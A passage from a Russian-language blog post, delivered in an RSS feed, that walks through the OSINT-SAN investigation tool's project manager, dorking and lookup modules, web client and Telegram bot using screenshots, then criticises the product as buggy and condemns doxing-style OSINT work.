    <img src="https://img4.teletype.in/files/38/c8/38c8fc62-904e-4aec-b896-d44f636a9c3b.png" width="1920" />
    <figcaption>report manager</figcaption>
  </figure>
  <p id="t5C3">У нас открывается пофикшенный в 13 версии report manager. Здесь чуть-чуть остановимся на функциях:</p>
  <ol id="QLSB">
    <li id="mbmy">Создаёт проект, после этого мы с можем в него зайти и работать.</li>
    <li id="1TTb">Показывает списки проектов.</li>
    <li id="RpWV">Запускает нас в выбранный нами проект.</li>
    <li id="Slyi">Удаляет выбранный проект.</li>
    <li id="ONtd">Генерирует отчёт.</li>
  </ol>
  <p id="ydhj">Ну 99 это стандартная кнопка выхода в главное меню.</p>
  <p id="CJVW">Не буду останавливаться на всех тулзах и фичах, кроме как выбора нашего проекта и генерации отчета. И так, мы уже создали проект с помощью цифры 1. Теперь выберем его с помощью цифры 3.</p>
  <figure id="SjAk" class="m_column">
    <img src="https://img1.teletype.in/files/c2/ea/c2ea2393-afc9-4663-b8af-c769864831fb.png" width="1920" />
    <figcaption>Выбор проекта</figcaption>
  </figure>
  <p id="dKgz">Возвращаемся в главное меню и видим следующее:</p>
  <figure id="97Jh" class="m_column">
    <img src="https://img2.teletype.in/files/52/98/52985457-5760-452e-8521-024f5114d4e0.png" width="1920" />
    <figcaption>Главное меню и отображение нашего проекта (выделено)</figcaption>
  </figure>
  <p id="Vm8u">Теперь у нас отображается test1 там где мы вводим команды.</p>
  <p id="Qkzr">Окей, теперь всё что нам остается, это поискать здесь инфу по нашей цели и сгенерировать отчёт.</p>
  <figure id="B91m" class="m_column">
    <img src="https://img3.teletype.in/files/ad/67/ad670351-c881-4c36-8dc7-aa83be79a0b8.png" width="1920" />
  </figure>
  <figure id="4DRv" class="m_column">
    <img src="https://img1.teletype.in/files/86/e0/86e057db-8a35-401a-b98e-8cad589c597b.png" width="1920" />
  </figure>
  <figure id="SGzx" class="m_column">
    <img src="https://img2.teletype.in/files/d1/cd/d1cd7db9-47ce-4c12-9255-f7a7abb7b2da.png" width="1920" />
  </figure>
  <p id="1mKH">Тут у меня выдало ошибку и здесь мы возвращаемся о корявости проекта.</p>
  <figure id="TkKF" class="m_column">
    <img src="https://img1.teletype.in/files/cd/bb/cdbbc548-8d40-4688-8210-6e597170e9f6.png" width="1920" />
  </figure>
  <p id="vTSC">Здесь мы заходим в модуль <code>region</code> который позволяет по нашему запросу доркнуть события в интернете. Доркинг - это использование слов-фильтров в поисковых системах, таких как Google, Yandex и другие.</p>
  <p id="y80P">Ну короче - чтобы нам добавить русский язык в кали, заходим в менеджер настроек, ищем там настройку <code>Keyboard</code>, заходим в <code>Layout</code>, выключаем вверху флажок дефолтных настроек, и с помощью разблокированной кнопки <code>Add</code> добавляем русский язык. В графе <code>Change layout option</code> выбираем как переключать язык, например стандартно Alt + Shift.</p>
  <p id="HWAT">Ну вот и всё. Собираем запросики событий в инете и идём генерить отчет.</p>
  <figure id="xMIY" class="m_column">
    <img src="https://img3.teletype.in/files/63/6e/636e7f3f-c23e-4480-9d4c-755e5acbf1f3.png" width="1920" />
  </figure>
  <figure id="WfGM" class="m_column">
    <img src="https://img2.teletype.in/files/51/2b/512bde01-3cc2-4083-8e7a-5727c4a4fc6a.png" width="1920" />
  </figure>
  <figure id="0XM6" class="m_column">
    <img src="https://img2.teletype.in/files/de/cd/decd8387-af37-48fe-8488-4ba8dd138ad3.png" width="1920" />
  </figure>
  <figure id="uQ1M" class="m_column">
    <img src="https://img4.teletype.in/files/39/f5/39f5d9c4-631a-499b-9f19-bd49fcd3776b.png" width="1920" />
  </figure>
  <p id="BjuN">Здесь ещё подсобрали инфу по почте.</p>
  <p id="3Ufy"></p>
  <p id="ftvj">Ну и напоследок скажу об одной важной команде - <code>help</code>.</p>
  <figure id="yM6j" class="m_column">
    <img src="https://img4.teletype.in/files/b5/5e/b55e85b5-d829-4907-86a9-720bc2a0f17b.png" width="1920" />
  </figure>
  <p id="ATvr">Здесь у нас отображаются красным все слова-модули, и ещё отдельным цветом в список так называемые теги. Теги - это слова, которые выдают нам источники где нарыть интересующую инфу. Проще говоря вбиваем тег, жмем Enter, и нам выдаст ресурсы на источники где можно пошерстить инфу по этому тегу. Например вводим email - получаем список сайтов где можно по email найти другие данные. Что-то вроде HowToFind и прочих агрегаторов инфы по OSINT источникам.</p>
  <p id="9Hfm">После окончания работы над проектом, обратно заходим в менеджер проектов.</p>
  <figure id="qZnl" class="m_column">
    <img src="https://img1.teletype.in/files/89/e6/89e66240-858a-4b12-a1bb-f8f0b8f3fddb.png" width="1920" />
  </figure>
  <figure id="urrx" class="m_column">
    <img src="https://img2.teletype.in/files/9c/fd/9cfd96ba-583b-4cf2-b95d-0a4b3bb18934.png" width="1920" />
  </figure>
  <p id="TCFA">С помощью цифры пять выбираем наш проект и генерим отчет, о чем успешно нам сообщает OSINT-SAN, написав, что наш отчёт сохранен в папке <code>report/</code></p>
  <figure id="lkRQ" class="m_column">
    <img src="https://img3.teletype.in/files/a8/be/a8be641b-23cc-4603-811f-df227bb8eb02.png" width="1920" />
  </figure>
  <figure id="EJii" class="m_column">
    <img src="https://img3.teletype.in/files/a1/fd/a1fd9357-11e1-44d3-95ae-6c517c08a74c.png" width="1920" />
  </figure>
  <figure id="ajnG" class="m_column">
    <img src="https://img1.teletype.in/files/01/08/0108fc3f-3a3e-4347-a346-4b057b238c40.png" width="1920" />
  </figure>
  <figure id="l1Fu" class="m_column">
    <img src="https://img2.teletype.in/files/d3/4c/d34ca662-e7e6-4946-9af8-bb4a5feec291.png" width="1920" />
  </figure>
  <figure id="d9uU" class="m_column">
    <img src="https://img2.teletype.in/files/9e/fb/9efb4ff9-8bdf-4d55-be4c-dcd325427436.png" width="1920" />
  </figure>
  <p id="dKh7">Отчёт прикреплю к посту в комменты, так что сами сможете с ним более подробно ознакомиться. В ознакомительных целях конечно же.</p>
  <p id="Szh7">И пару слов о других прогах.</p>
  <p id="iHyc">Значит Web-клиент выглядит так:</p>
  <figure id="4ebz" class="m_column">
    <img src="https://img2.teletype.in/files/d2/c3/d2c35520-8297-4a10-bb13-30f9a9b88704.png" width="1853" />
  </figure>
  <p id="7BKn">Здесь прикольная фишка с камерами на карте, но на момент написания поста она сдохла, увы.</p>
  <figure id="IgAe" class="m_column">
    <img src="https://img1.teletype.in/files/84/80/84800cf4-bc46-4a9a-aaf7-3c72373d4fa7.png" width="806" />
  </figure>
  <p id="eoQa">Бот телеграм. Ну здесь всё по стандарту, ничего нового.</p>
  <h3 id="KVdu">Итоги и ответ на вопрос: &quot;ну так и че такое OSINT??&quot;</h3>
  <p id="Jj41">Покончив с обзором OSINT-SAN, хочу сказать следующее - продукт сырой, ждать доработки ещё придется N количество времени. Благо Максим Викторович нашёл программиста, так что надеюсь дело сдвинется с мертвой точки. Пока своих денег продукт не стоит, по функционалу и количеству багов. Моё субъективное мнение.</p>
  <p id="KDeJ">Для чего данный пост был написан? А для того, чтобы заострить ваше внимание на одной простой истине. Если ваш OSINT сводится к тупому тыканью в глазе бога и радостным крикам: &quot;хы-хы-хы задоксил&quot; - то хуевый с вас OSINT специалист. Лично я не могу относиться серьезно к тем, кто не умея банально автоматизировать сбор информации из баз данных и открытых источников обучает чему-то людей за большие деньги, берет в работу расследования инцидентов у коммерции или боже упаси, у физических лиц. Ну нет у вас квалификации должного уровня, хоть убей. Глаз бога умрет и вместе с ним умрут тысячи &quot;крутых&quot; осинтеров СНГ. Только через личный труд, постижение программирования, логики, автоматизации и агрегации инструментария растёт уровень компетенций OSINT специалиста. И именно как не асынтера, доксера, сватера и прочей чепухи, а как серьезного, с высокоразвитым критическим мышлением аналитика - военного, коммерческого, да и любого другого фронта.</p>
  <p id="UmAH">Рекомендую скачать бесплатную версию OSINT-SAN и самостоятельно потыкаться в нем. Людям со знанием python должно качнуть проф. навыки.</p>
  <p id="nEJ3">Кстати ВАЖНО - OSINT-SAN собирает инфу о своих клиентах. Так что учитывайте это при работе с этим и любыми другими ботами/приложениями/веб-сервисами.</p>
  <p id="Mj96">Благодарю за прочтение статьи.</p>

]]></content:encoded></item></channel></rss>